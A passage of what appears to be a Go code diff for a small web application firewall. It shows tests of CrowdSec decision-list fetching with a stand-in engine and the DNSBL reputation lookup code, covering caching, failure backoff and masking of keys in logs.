got[0].Detail["source"] != reputation.AbuseIPDBSource ||
got[0].Detail["error"] != failure || queue.Suppressed() != held {
t.Errorf("alerts waiting %+v, %d held back, want only AbuseIPDB's %q with %q, "+
"and %d", got, queue.Suppressed(), reason, failure, held)
}
}
// wantBudgetLeft checks how many checks the day's budget has left.
func wantBudgetLeft(t *testing.T, checker *reputation.AbuseIPDB, want int) {
t.Helper()
if got := checker.BudgetLeft(); got != want {
t.Errorf("%d checks left, want %d", got, want)
}
}
// scrapeMetrics returns the metrics m serves.
func scrapeMetrics(t *testing.T, m *metrics.Metrics) string {
t.Helper()
scraped := httptest.NewRecorder()
m.ServeHTTP(scraped, httptest.NewRequestWithContext(t.Context(), http.MethodGet, "/",
http.NoBody))
return scraped.Body.String()
}
+513
View File
@@ -0,0 +1,513 @@
package reputation_test
import (
"bytes"
"encoding/json"
"fmt"
"io"
"log/slog"
"net/http"
"net/netip"
"reflect"
"strings"
"sync"
"testing"
"testing/synctest"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/reputation"
)
// The tests run in a synctest bubble, as those of the blocklists do, and
// fetch the decision list from engine, a stand-in for a CrowdSec engine
// that answers without the network.
const (
// decisionsURL is the decision list of the tests' engine, and engineKey
// the key it answers.
decisionsURL = "http://crowdsec.example:8080/v1/decisions"
engineKey = "crowdsec-key-0123456789abcdef"
// sshBF and probing are scenarios of the engine's decisions.
sshBF = "crowdsecurity/ssh-bf"
probing = "crowdsecurity/http-probing"
// ban is the type of a decision to ban, and rangeScope the scope of a
// decision on a netblock, as CrowdSec names them.
ban = "ban"
rangeScope = "Range"
)
func TestCrowdSecDecisionBansItsNetblockUntilItEndsEvenWithTheEngineDown(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
began := time.Now()
manual := "manual 'ban' from 'localhost'"
e := &engine{key: engineKey, decisions: []decision{
{"Ip", suspect, ban, manual, began.Add(6 * time.Hour)},
// A shorter decision on the same address, which is not the one
// used.
{"Ip", suspect, ban, sshBF, began.Add(4 * time.Hour)},
{rangeScope, "198.51.100.0/24", ban, probing, began.Add(time.Hour)},
{"Ip", "2001:db8::1", ban, sshBF, began.Add(2 * time.Hour)},
// Left out: a decision to show a captcha, and one on a country.
{"Ip", "192.0.2.50", "captcha", probing, began.Add(time.Hour)},
{"Country", "KP", ban, manual, began.Add(time.Hour)},
}}
lists := start(t, e, crowdSecParams())
for addr, want := range map[string]reputation.Decision{
suspect: {Expires: began.Add(6 * time.Hour), Scenario: manual},
"198.51.100.0": {Expires: began.Add(time.Hour), Scenario: probing},
"198.51.100.255": {Expires: began.Add(time.Hour), Scenario: probing},
"2001:db8::1": {Expires: began.Add(2 * time.Hour), Scenario: sshBF},
"203.0.113.10": {},
"198.51.101.0": {},
"2001:db8::2": {},
"192.0.2.50": {},
} {
wantDecision(t, lists, addr, want)
}
// With the engine down, the copy kept still holds the decision on
// 198.51.100.0/24, which no longer bans once it has ended.
e.set(func(e *engine) { e.failing = true })
time.Sleep(time.Hour - time.Nanosecond)
synctest.Wait()
wantDecision(t, lists, "198.51.100.7",
reputation.Decision{Expires: began.Add(time.Hour), Scenario: probing})
time.Sleep(time.Nanosecond)
synctest.Wait()
wantDecision(t, lists, "198.51.100.7", reputation.Decision{})
wantDecision(t, lists, suspect,
reputation.Decision{Expires: began.Add(6 * time.Hour), Scenario: manual})
})
}
func TestCrowdSecDecisionListFetchedAgainEveryMinute(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
began := time.Now()
e := &engine{key: engineKey, decisions: []decision{
{"Ip", suspect, ban, sshBF, began.Add(4 * time.Hour)},
}}
lists := start(t, e, crowdSecParams())
wantEngineFetches(t, e, 1)
added := reputation.Decision{Expires: began.Add(2 * time.Hour), Scenario: probing}
e.set(func(e *engine) {
e.decisions = append(e.decisions,
decision{"Ip", "203.0.113.10", ban, probing, added.Expires})
})
time.Sleep(time.Minute - time.Nanosecond)
wantEngineFetches(t, e, 1)
wantDecision(t, lists, "203.0.113.10", reputation.Decision{})
time.Sleep(time.Nanosecond)
wantEngineFetches(t, e, 2)
wantDecision(t, lists, "203.0.113.10", added)
})
}
func TestCrowdSecDecisionOnAClientIsTheOneThatEndsLast(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
began := time.Now()
e := &engine{key: engineKey, decisions: []decision{
// Two decisions on one address, the shorter listed first.
{"Ip", suspect, ban, sshBF, began.Add(2 * time.Hour)},
{"Ip", suspect, ban, probing, began.Add(4 * time.Hour)},
// 198.51.100.130 is held by a decision on its address that ends
// after the one on its netblock, and 192.0.2.20 by one that ends
// before.
{rangeScope, "198.51.100.128/25", ban, sshBF, began.Add(time.Hour)},
{"Ip", "198.51.100.130", ban, probing, began.Add(3 * time.Hour)},
{rangeScope, "192.0.2.0/24", ban, probing, began.Add(5 * time.Hour)},
{"Ip", "192.0.2.20", ban, sshBF, began.Add(2 * time.Hour)},
}}
lists := start(t, e, crowdSecParams())
wantDecision(t, lists, suspect,
reputation.Decision{Expires: began.Add(4 * time.Hour), Scenario: probing})
wantDecision(t, lists, "198.51.100.130",
reputation.Decision{Expires: began.Add(3 * time.Hour), Scenario: probing})
wantDecision(t, lists, "192.0.2.20",
reputation.Decision{Expires: began.Add(5 * time.Hour), Scenario: probing})
})
}
func TestCrowdSecAnswerOfNoDecisionIsAGoodCopyThatListsNoClient(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
began := time.Now()
e := &engine{key: engineKey, decisions: []decision{
{"Ip", suspect, ban, sshBF, began.Add(4 * time.Hour)},
}}
lists := start(t, e, crowdSecParams())
// With its decision deleted, the engine answers null.
e.set(func(e *engine) { e.decisions = nil })
time.Sleep(time.Minute)
wantEngineFetches(t, e, 2)
want := []reputation.List{{
URL: decisionsURL, Tried: time.Now(), Fetched: time.Now(), Lines: []string{"null"},
}}
if got := lists.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("lists %+v, want %+v", got, want)
}
if lists.Failures(decisionsURL) != 0 {
t.Errorf("%d failures, want 0", lists.Failures(decisionsURL))
}
wantDecision(t, lists, suspect, reputation.Decision{})
})
}
func TestCrowdSecFailureKeepsTheLastGoodCopyAlertsOncePerCooldownAndHidesTheKey(
t *testing.T,
) {
t.Parallel()
for _, tc := range crowdSecFailures() {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
began := time.Now()
e := &engine{key: engineKey, decisions: []decision{
{"Ip", suspect, ban, sshBF, began.Add(4 * time.Hour)},
}}
queue := newQueue()
p := crowdSecParams()
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
p.Alerts = queue
lists := start(t, e, p)
kept := lists.Snapshot()
e.set(tc.fail)
// Each failure is tried again a minute after it.
for range 2 {
time.Sleep(time.Minute)
synctest.Wait()
}
wantEngineFetches(t, e, 3)
wantDecision(t, lists, suspect,
reputation.Decision{Expires: began.Add(4 * time.Hour), Scenario: sshBF})
want := kept[0]
want.Tried = time.Now()
if got := lists.Snapshot(); !reflect.DeepEqual(got, []reputation.List{want}) {
t.Errorf("lists %+v, want the first copy, last tried now, %+v", got, want)
}
if lists.Failures(decisionsURL) != 2 {
t.Errorf("%d failures, want 2", lists.Failures(decisionsURL))
}
// One alert for the first failure; the cooldown holds back the
// second.
wantAlert(t, queue,
fetchFailure(time.Now().Add(-time.Minute), decisionsURL, tc.error))
if !strings.Contains(log.String(), `"msg":"fetching a list failed",`+
`"url":"`+decisionsURL+`","error":"`+tc.error) {
t.Errorf("logged\n%s\nwant the failures", log.String())
}
wantKeyNotShown(t, e, log.String(), lists, queue)
})
})
}
}
// crowdSecFailure is a way for the engine to fail: fail has it answer the
// fetches after the first so that they fail with error.
type crowdSecFailure struct {
name string
fail func(e *engine)
error string
}
// crowdSecFailures returns the ways the engine can fail.
func crowdSecFailures() []crowdSecFailure {
const notDecision = " does not give an address or a netblock and a duration, " +
"such as 4h0m0s"
return []crowdSecFailure{
{
"an answer other than 200",
func(e *engine) { e.failing = true },
"the server answered 503 Service Unavailable",
},
{
"a key the engine refuses",
func(e *engine) { e.key = "another-key-0123456789abcdef" },
"the server answered 403 Forbidden",
},
{
"a redirect",
func(e *engine) { e.redirect = "http://elsewhere.example/v1/decisions" },
"the server answered 302 Found",
},
{
"an answer that does not read",
func(e *engine) { e.answer = "<html>" },
"read the answer: invalid character '<' looking for beginning of value",
},
{
"a decision to ban whose value does not read",
func(e *engine) {
e.answer = `[{"duration": "4h", "scenario": "` + sshBF + `", ` +
`"scope": "Ip", "type": "ban", "value": "203.0.113.300"}]`
},
"decision 1" + notDecision,
},
{
"a decision to ban whose duration does not read",
func(e *engine) {
e.answer = `[{"duration": "4h", "scope": "Country", "type": "ban", ` +
`"value": "KP"}, {"duration": "four hours", "scope": "Range", ` +
`"type": "ban", "value": "198.51.100.0/24"}]`
},
"decision 2" + notDecision,
},
}
}
// wantKeyNotShown checks that no fetch carried the engine's key to a URL
// other than its decision list, such as the one a redirect names, and that
// the key is in none of what the fetches leave behind: log, the process
// log, the alerts waiting in queue, and the copies of lists, which
// reputation.json keeps.
func wantKeyNotShown(
t *testing.T, e *engine, log string, lists *reputation.Lists, queue *alerts.Queue,
) {
t.Helper()
e.mu.Lock()
keySentTo := e.keySentTo
e.mu.Unlock()
if len(keySentTo) != 0 {
t.Errorf("the key was sent to %v", keySentTo)
}
shown, err := json.Marshal([]any{lists.Snapshot(), waiting(queue)})
if err != nil {
t.Fatalf("encode: %v", err)
}
if strings.Contains(log+string(shown), engineKey) {
t.Errorf("the key is shown in\n%s\n%s", log, shown)
}
}
func TestCrowdSecDecisionListKeptAcrossARestartEndsWhenItsDecisionsDo(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
began := time.Now()
e := &engine{key: engineKey, decisions: []decision{
{rangeScope, "198.51.100.0/24", ban, probing, began.Add(time.Hour)},
}}
lists := start(t, e, crowdSecParams())
kept := lists.Snapshot()
// Restarted half an hour later with what reputation.json keeps, and
// the engine down, the decision still bans, until the end it had at
// the fetch, half an hour on.
time.Sleep(30 * time.Minute)
down := &engine{key: engineKey, failing: true}
again := reputation.New(crowdSecParams())
again.SetTransport(down)
err := again.Load(kept)
if err != nil {
t.Fatalf("load: %v", err)
}
run(t, again)
want := reputation.Decision{Expires: began.Add(time.Hour), Scenario: probing}
wantDecision(t, again, "198.51.100.7", want)
time.Sleep(30*time.Minute - time.Nanosecond)
synctest.Wait()
wantDecision(t, again, "198.51.100.7", want)
time.Sleep(time.Nanosecond)
synctest.Wait()
wantDecision(t, again, "198.51.100.7", reputation.Decision{})
})
}
func TestLoadTakesACrowdSecListNeverFetchedAndRefusesACopyThatDoesNotRead(
t *testing.T,
) {
t.Parallel()
now := time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)
lists := reputation.New(crowdSecParams())
// Tried, and never fetched: there is no copy to read.
err := lists.Load([]reputation.List{{URL: decisionsURL, Tried: now}})
if err != nil {
t.Errorf("load the list never fetched: %v", err)
}
err = lists.Load([]reputation.List{{
URL: decisionsURL, Tried: now, Fetched: now, Lines: []string{
`[{"duration": "4h", "scope": "Range", "type": "ban", ` +
`"value": "198.51.100.0/33"}]`,
},
}})
const want = "the copy of " + decisionsURL + ": decision 1 does not give an " +
"address or a netblock and a duration, such as 4h0m0s"
if err == nil || err.Error() != want {
t.Errorf("error %v, want %s", err, want)
}
}
// engine is a stand-in for the local API of a CrowdSec engine. It answers
// a fetch of the decision list that carries its key in X-Api-Key with its
// decisions still in force, each with the time it has left as it answers,
// by the bubble's clock, as an engine does, or with answer while that is
// not "". It answers 403 to a fetch without its key, as an engine does,
// with a redirect to redirect while that is not "", and 503 while failing.
// It counts the fetches, and notes in keySentTo the URL of each fetch of
// another URL that carries a key, as one following a redirect would.
type engine struct {
mu sync.Mutex
key string
decisions []decision
answer string
redirect string
failing bool
fetches int
keySentTo []string
}
// decision is a decision of the engine, which ends at expires.
type decision struct {
scope, value, kind, scenario string
expires time.Time
}
// RoundTrip has the engine answer req, in place of the network.
func (e *engine) RoundTrip(req *http.Request) (*http.Response, error) {
e.mu.Lock()
defer e.mu.Unlock()
e.fetches++
if req.URL.String() != decisionsURL && req.Header.Get("X-Api-Key") != "" {
e.keySentTo = append(e.keySentTo, req.URL.String())
}
status, header, body := http.StatusOK, http.Header{}, e.answer
switch {
case req.URL.String() != decisionsURL || req.Header.Get("X-Api-Key") != e.key:
status, body = http.StatusForbidden, `{"message":"access forbidden"}`
case e.redirect != "":
status, header = http.StatusFound, http.Header{"Location": {e.redirect}}
case e.failing:
status, body = http.StatusServiceUnavailable, ""
case body == "":
body = e.inForce(time.Now())
}
return &http.Response{
StatusCode: status,
Status: fmt.Sprintf("%d %s", status, http.StatusText(status)),
Header: header,
Body: io.NopCloser(strings.NewReader(body)),
Request: req,
}, nil
}
// inForce returns the decisions in force at now, as the engine answers
// them: a JSON list, null for none.
func (e *engine) inForce(now time.Time) string {
var answer []map[string]string
for _, d := range e.decisions {
if now.Before(d.expires) {
answer = append(answer, map[string]string{
"duration": d.expires.Sub(now).String(), "origin": "crowdsec",
"scenario": d.scenario, "scope": d.scope, "type": d.kind, "value": d.value,
})
}
}
body, err := json.Marshal(answer)
if err != nil {
panic(err) // a list of maps of strings always encodes
}
return string(body)
}
// set changes the engine with change.
func (e *engine) set(change func(e *engine)) {
e.mu.Lock()
defer e.mu.Unlock()
change(e)
}
// crowdSecParams returns the Params of the decision list of the tests'
// engine, fetched with its key, by the bubble's clock, with alerts to a
// queue that sends none.
func crowdSecParams() reputation.Params {
p := params()
p.CrowdSecDecisionsURL = decisionsURL
p.CrowdSecKey = engineKey
return p
}
// wantEngineFetches waits until Run has made the fetches due, and checks
// how many the engine has had.
func wantEngineFetches(t *testing.T, e *engine, want int) {
t.Helper()
synctest.Wait()
e.mu.Lock()
got := e.fetches
e.mu.Unlock()
if got != want {
t.Errorf("%d fetches, want %d", got, want)
}
}
// wantDecision checks the decision lists says is in force on addr now,
// the zero Decision for none.
func wantDecision(
t *testing.T, lists *reputation.Lists, addr string, want reputation.Decision,
) {
t.Helper()
got, listed := lists.CrowdSecDecision(netip.MustParseAddr(addr), time.Now())
if listed != !want.Expires.IsZero() ||
listed && (!got.Expires.Equal(want.Expires) || got.Scenario != want.Scenario) {
t.Errorf("%s has the decision %+v in force %t, want %+v", addr, got, listed, want)
}
}
+332
View File
@@ -0,0 +1,332 @@
package reputation
import (
"cmp"
"context"
"encoding/hex"
"errors"
"fmt"
"log/slog"
"net"
"net/netip"
"slices"
"strings"
"sync"
"time"
"github.com/hashicorp/golang-lru/v2/simplelru"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/config"
)
const (
// maxVerdicts is how many verdicts of the DNSBL zones are kept, and how
// many scores of AbuseIPDB. Past it, the one fetched longest ago is
// dropped.
maxVerdicts = 100000
// maxQueries is how many queries may be under way at once. Past it, a
// zone is not asked about a client until the client's next request, so
// that a swarm of new addresses cannot fill the memory.
maxQueries = 1000
// failureDelay is how long a zone is not asked again after a query to
// it fails, and no client is checked with AbuseIPDB after a check
// fails, so that a source refusing them is not asked on every request.
failureDelay = time.Minute
)
var (
errAsk = errors.New("ask the zone")
errRefused = errors.New("the zone refused the query")
errNotListing = errors.New("the answer is outside 127.0.0.0/8")
)
// Verdict is what a zone said about a client, as reputation.json holds
// it: the zone, the client's address, whether the zone lists it, and when
// the zone answered.
type Verdict struct {
Zone string `json:"zone"`
Client netip.Addr `json:"client"`
Listed bool `json:"listed"`
Fetched time.Time `json:"fetched"`
}
// DNSBLParams are what NewDNSBL needs.
type DNSBLParams struct {
// Zones are the DNSBL zones clients are asked about in
// (SWWAF_DNSBL_ZONES).
Zones []string
// Resolver is the resolver they are asked through
// (SWWAF_DNSBL_RESOLVER), or, while it is the zero AddrPort, the
// host's, as /etc/resolv.conf names it.
Resolver netip.AddrPort
// CacheTTL is how long a verdict is used after it was fetched
// (SWWAF_REPUTATION_CACHE_TTL), and Timeout how long a query may take
// (SWWAF_REPUTATION_TIMEOUT).
CacheTTL time.Duration
Timeout time.Duration
// Now tells the time, normally time.Now in UTC.
Now func() time.Time
// ProcessLog receives each query that fails, and why.
ProcessLog *slog.Logger
// Alerts receive a source_failure alert for each query that fails.
Alerts *alerts.Queue
}
// DNSBL asks the DNSBL zones about clients, in the background, and keeps
// their verdicts. It is safe for concurrent use.
type DNSBL struct {
params DNSBLParams
resolver *net.Resolver
mu sync.Mutex
// verdicts are by query. Each is added as it is fetched and never moved
// up, so that the one fetched longest ago is the first dropped.
verdicts *simplelru.LRU[query, Verdict]
// asking are the queries under way.
asking map[query]bool
// queries and failures count, by zone, the queries made and those that
// failed, and retryAt is when a zone whose last query failed may be
// asked again.
queries map[string]int
failures map[string]int
retryAt map[string]time.Time
}
// query is a client's address, to ask a zone about.
type query struct {
zone string
client netip.Addr
}
// NewDNSBL returns a DNSBL with no verdict yet.
func NewDNSBL(params DNSBLParams) *DNSBL {
verdicts, err := simplelru.NewLRU[query, Verdict](maxVerdicts, nil)
if err != nil {
panic(err) // NewLRU fails only for a size below one
}
resolver := &net.Resolver{}
if params.Resolver.IsValid() {
// Dial is used by Go's own resolver alone.
resolver.PreferGo = true
resolver.Dial = func(ctx context.Context, network, _ string) (net.Conn, error) {
var dialer net.Dialer
return dialer.DialContext(ctx, network, params.Resolver.String())
}
}
return &DNSBL{
params: params,
resolver: resolver,
verdicts: verdicts,
asking: map[query]bool{},
queries: map[string]int{},
failures: map[string]int{},
retryAt: map[string]time.Time{},
}
}
// Zones returns the zones, in the order SWWAF_DNSBL_ZONES names them.
func (d *DNSBL) Zones() []string {
return slices.Clone(d.params.Zones)
}
// ListedBy returns the zones whose verdict on addr, a client's address,
// lists it, in the order SWWAF_DNSBL_ZONES names them, each with its key
// masked, as config.MaskZoneKey masks it, since they go to the request
// log, the alerts and the metrics. A verdict is used until CacheTTL has
// passed since it was fetched. Each zone without one is asked about addr
// in the background, unless a query about addr to it is under way, the
// zone is left alone after a failure, or maxQueries are under way;
// ListedBy never waits for a query. ctx is the context of the client's
// request, and a query goes on after the request ends.
func (d *DNSBL) ListedBy(ctx context.Context, addr netip.Addr) []string {
d.mu.Lock()
defer d.mu.Unlock()
now := d.params.Now()
var listedBy []string
for _, zone := range d.params.Zones {
q := query{zone: zone, client: addr}
kept, found := d.verdicts.Peek(q)
switch {
case found && now.Sub(kept.Fetched) < d.params.CacheTTL:
if kept.Listed {
listedBy = append(listedBy, config.MaskZoneKey(zone))
}
case !d.asking[q] && !now.Before(d.retryAt[zone]) && len(d.asking) < maxQueries:
d.asking[q] = true
d.queries[zone]++
go d.ask(context.WithoutCancel(ctx), q)
}
}
return listedBy
}
// Queries returns how many queries were made to zone.
func (d *DNSBL) Queries(zone string) int {
d.mu.Lock()
defer d.mu.Unlock()
return d.queries[zone]
}
// Failures returns how many queries to zone failed.
func (d *DNSBL) Failures(zone string) int {
d.mu.Lock()
defer d.mu.Unlock()
return d.failures[zone]
}
// Snapshot returns every verdict still in use, sorted by client, then by
// zone, as reputation.json lists them.
func (d *DNSBL) Snapshot() []Verdict {
d.mu.Lock()
now := d.params.Now()
verdicts := make([]Verdict, 0, d.verdicts.Len())
for _, kept := range d.verdicts.Values() {
if now.Sub(kept.Fetched) < d.params.CacheTTL {
verdicts = append(verdicts, kept)
}
}
d.mu.Unlock()
slices.SortFunc(verdicts, func(a, b Verdict) int {
return cmp.Or(a.Client.Compare(b.Client), strings.Compare(a.Zone, b.Zone))
})
return verdicts
}
// Load keeps verdicts, read from reputation.json, in place of those it
// keeps, but for those of a zone SWWAF_DNSBL_ZONES does not name, and,
// past maxVerdicts, those fetched longest ago. One fetched CacheTTL ago or
// more is neither used nor written, as for any verdict.
func (d *DNSBL) Load(verdicts []Verdict) {
verdicts = slices.Clone(verdicts)
slices.SortStableFunc(verdicts, func(a, b Verdict) int {
return a.Fetched.Compare(b.Fetched)
})
d.mu.Lock()
defer d.mu.Unlock()
d.verdicts.Purge()
for _, kept := range verdicts {
if slices.Contains(d.params.Zones, kept.Zone) {
d.verdicts.Add(query{zone: kept.Zone, client: kept.Client}, kept)
}
}
}
// ask asks q's zone about q's client, keeps the verdict, and notes the
// query as no longer under way. A query that fails gives no verdict: it
// is counted, logged and raised as a source_failure alert, which show the
// zone with its key masked, and the zone is not asked again for
// failureDelay.
func (d *DNSBL) ask(ctx context.Context, q query) {
listed, err := d.lookUp(ctx, q)
now := d.params.Now()
d.mu.Lock()
delete(d.asking, q)
if err == nil {
d.verdicts.Add(q, Verdict{
Zone: q.zone, Client: q.client, Listed: listed, Fetched: now,
})
} else {
d.failures[q.zone]++
d.retryAt[q.zone] = now.Add(failureDelay)
}
d.mu.Unlock()
if err != nil {
const failed = "asking a DNSBL zone failed"
shown := config.MaskZoneKey(q.zone)
// Raised before it is logged, so that the alert is there once the
// log line is.
raiseFailure(d.params.Alerts, failed, shown, err)
d.params.ProcessLog.Warn(failed, "zone", shown, "error", err.Error())
}
}
// lookUp asks q's zone about q's client through the resolver, and returns
// whether the zone lists it, as readAnswer reads the answer. No such name
// is a client the zone does not list. A query not answered within Timeout
// fails.
func (d *DNSBL) lookUp(ctx context.Context, q query) (bool, error) {
ctx, cancel := context.WithTimeout(ctx, d.params.Timeout)
defer cancel()
answer, err := d.resolver.LookupNetIP(ctx, "ip4", queryName(q.zone, q.client))
var dnsErr *net.DNSError
switch {
case err == nil:
return readAnswer(answer)
case errors.As(err, &dnsErr) && dnsErr.IsNotFound:
return false, nil
case errors.As(err, &dnsErr):
// The error names the name asked about, which holds the client's
// address, which is not to be logged: only what went wrong is kept.
return false, fmt.Errorf("%w: %s", errAsk, dnsErr.Err)
default:
return false, fmt.Errorf("%w: %w", errAsk, err)
}
}
// queryName returns the name a zone is asked about addr by, as RFC 5782
// builds it: the four numbers of an IPv4 address, or the 32 hex digits of
// an IPv6 address, in reverse order, each followed by a dot, then the zone
// and a dot, which makes it a full name, to which the resolver adds no
// search domain of /etc/resolv.conf.
func queryName(zone string, addr netip.Addr) string {
parts := strings.Split(addr.String(), ".")
if addr.Is6() {
parts = strings.Split(hex.EncodeToString(addr.AsSlice()), "")
}
slices.Reverse(parts)
return strings.Join(parts, ".") + "." + zone + "."
}
// readAnswer reads the addresses a zone answered with. An address in
// 127.0.0.0/8 lists the client, as RFC 5782 has zones answer, but one in
// 127.255.255.0/24 is how Spamhaus refuses a query, such as one sent
// through a public resolver or one past its limit, and is a failure. So is
// an address outside 127.0.0.0/8, such as a resolver gives that answers
// even for names that do not exist.
func readAnswer(answer []netip.Addr) (bool, error) {
listing := netip.MustParsePrefix("127.0.0.0/8")
refusal := netip.MustParsePrefix("127.255.255.0/24")
for _, addr := range answer {
switch {
case refusal.Contains(addr):
return false, fmt.Errorf("%w: %s", errRefused, addr)
case !listing.Contains(addr):
return false, fmt.Errorf("%w: %s", errNotListing, addr)
}
}
return len(answer) > 0, nil
}
+737
View File
@@ -0,0 +1,737 @@
package reputation_test
import (
"bytes"
"context"
"encoding/binary"
"errors"
"io"
"log/slog"
"net"
"net/http"
"net/http/httptest"
"net/netip"
"reflect"
"slices"
"strings"
"sync"
"testing"
"testing/synctest"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/metrics"
"sneak.berlin/go/smallwebwaf/internal/reputation"
)
// The tests of the DNSBL zones run in synctest bubbles, as those of the
// lists do, and the resolver the zones are asked through is a stand-in
// reached through an in-memory connection, net.Pipe's, for the same
// reason. They run one at a time, none in parallel with another test of
// this package: Go's resolver counts the queries under way in one
// sync.WaitGroup for the whole process, and the process fails when
// queries from two bubbles, or from a bubble and from outside one, are
// under way at once. TestMain has the resolver make its configuration,
// which it makes on its first query, outside every bubble, since the
// configuration holds a channel, which the bubble it was made in would
// keep to itself.
const (
// zone and otherZone are the DNSBL zones the tests name.
zone = "dnsbl.example"
otherZone = "other.example"
// cacheTTL is the tests' SWWAF_REPUTATION_CACHE_TTL, and timeout their
// SWWAF_REPUTATION_TIMEOUT: a second, the least time /etc/resolv.conf
// can have Go's resolver wait for one server, so that it is the
// DNSBL's own timeout that ends a query, whatever that file says.
cacheTTL = 24 * time.Hour
timeout = time.Second
// listed and unlisted are clients zone is asked about by the names
// listedName and unlistedName, and most tests have zone list the first
// alone, by answering with listing.
listed = "192.0.2.99"
unlisted = "192.0.2.100"
listedName = "99.2.0.192." + zone + "."
unlistedName = "100.2.0.192." + zone + "."
listing = "127.0.0.2"
)
// The DNS response codes the stand-in answers with, besides no error.
const (
serverFailure = 2
noSuchName = 3
refused = 5
)
var errNoNetwork = errors.New("the test dials nothing")
func TestMain(m *testing.M) {
// A query that fails at once, as nothing is dialled for it.
resolver := &net.Resolver{
PreferGo: true,
Dial: func(context.Context, string, string) (net.Conn, error) {
return nil, errNoNetwork
},
}
_, _ = resolver.LookupNetIP(context.Background(), "ip4", "warm-up.invalid.")
m.Run()
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestZonesListOrNotClientsByTheirIPv4AndIPv6Addresses(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
// The addresses of the examples of RFC 5782, and the names it
// gives for them.
const (
v4 = "192.0.2.99"
v6 = "2001:db8:1:2:3:4:567:89ab"
// v6Name is the hex digits of v6, in reverse order.
v6Name = "b.a.9.8.7.6.5.0.4.0.0.0.3.0.0.0.2.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2."
)
resolver := &resolverStandIn{answers: map[string]answer{
"99.2.0.192." + zone + ".": {addrs: []string{listing}},
v6Name + otherZone + ".": {addrs: []string{"127.0.0.4", "127.0.0.10"}},
"99.2.0.192." + otherZone + ".": {},
}}
dnsbl := newDNSBL(resolver, dnsblParams(zone, otherZone))
// Neither client has a verdict yet, so neither is listed, and each
// zone is asked about each.
wantZones(t, dnsbl, v4)
wantZones(t, dnsbl, v6)
synctest.Wait()
wantZones(t, dnsbl, v4, zone)
wantZones(t, dnsbl, v6, otherZone)
wantAsked(t, resolver,
"99.2.0.192."+zone+".", "99.2.0.192."+otherZone+".",
v6Name+zone+".", v6Name+otherZone+".")
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestListedByNeverWaitsForAQuery(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
dnsbl := newDNSBL(&resolverStandIn{hanging: true}, dnsblParams(zone))
began := time.Now()
// The second, while the first's query is under way, starts none.
wantZones(t, dnsbl, listed)
wantZones(t, dnsbl, listed)
if waited := time.Since(began); waited != 0 {
t.Errorf("waited %s for the query, want no wait", waited)
}
synctest.Wait()
wantQueries(t, dnsbl, 1, 0)
waitForTheResolver()
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestVerdictUsedUntilTheCacheTTLHasPassedSinceItWasFetched(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
resolver := &resolverStandIn{answers: map[string]answer{
listedName: {addrs: []string{listing}},
}}
dnsbl := newDNSBL(resolver, dnsblParams(zone))
wantZones(t, dnsbl, listed)
wantZones(t, dnsbl, unlisted)
synctest.Wait()
// The zone lists the other client from now on, but the verdicts
// kept are used, and the zone is not asked again, until the TTL
// has passed.
resolver.set(listedName, answer{rcode: noSuchName})
resolver.set(unlistedName, answer{addrs: []string{listing}})
time.Sleep(cacheTTL - time.Nanosecond)
wantZones(t, dnsbl, listed, zone)
wantZones(t, dnsbl, unlisted)
synctest.Wait()
wantQueries(t, dnsbl, 2, 0)
// Then neither verdict is used, and both clients are asked about
// again.
time.Sleep(time.Nanosecond)
wantZones(t, dnsbl, listed)
wantZones(t, dnsbl, unlisted)
synctest.Wait()
wantQueries(t, dnsbl, 4, 0)
wantZones(t, dnsbl, listed)
wantZones(t, dnsbl, unlisted, zone)
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestQueryNotAnsweredWithinTheTimeoutFails(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
queue := newQueue()
p := dnsblParams(zone)
p.Alerts = queue
dnsbl := newDNSBL(&resolverStandIn{hanging: true}, p)
wantZones(t, dnsbl, listed)
time.Sleep(timeout - time.Nanosecond)
synctest.Wait()
wantQueries(t, dnsbl, 1, 0)
time.Sleep(time.Nanosecond)
synctest.Wait()
wantQueries(t, dnsbl, 1, 1)
if got := waiting(queue); len(got) != 1 ||
got[0].Detail["error"] != "ask the zone: i/o timeout" {
t.Errorf("alerts waiting %+v, want the timeout's", got)
}
if verdicts := dnsbl.Snapshot(); len(verdicts) != 0 {
t.Errorf("verdicts %+v, want none", verdicts)
}
waitForTheResolver()
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestZoneThatFailsOrRefusesGivesNoVerdictAndIsLeftAloneForAMinute(t *testing.T) {
for _, tc := range []struct {
name string
answer answer
error string
}{
{
"a server failure", answer{rcode: serverFailure},
"ask the zone: server misbehaving",
},
{"a refusal", answer{rcode: refused}, "ask the zone: server misbehaving"},
{
"an answer in 127.255.255.0/24, with which Spamhaus refuses a query",
answer{addrs: []string{"127.255.255.254"}},
"the zone refused the query: 127.255.255.254",
},
{
"an answer outside 127.0.0.0/8, as for a name that does not exist",
answer{addrs: []string{"192.0.2.1"}},
"the answer is outside 127.0.0.0/8: 192.0.2.1",
},
} {
//nolint:paralleltest // one at a time, as the comment at the top of this file says
t.Run(tc.name, func(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
queue := newQueue()
p := dnsblParams(zone)
p.Alerts = queue
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
dnsbl := newDNSBL(&resolverStandIn{answers: map[string]answer{
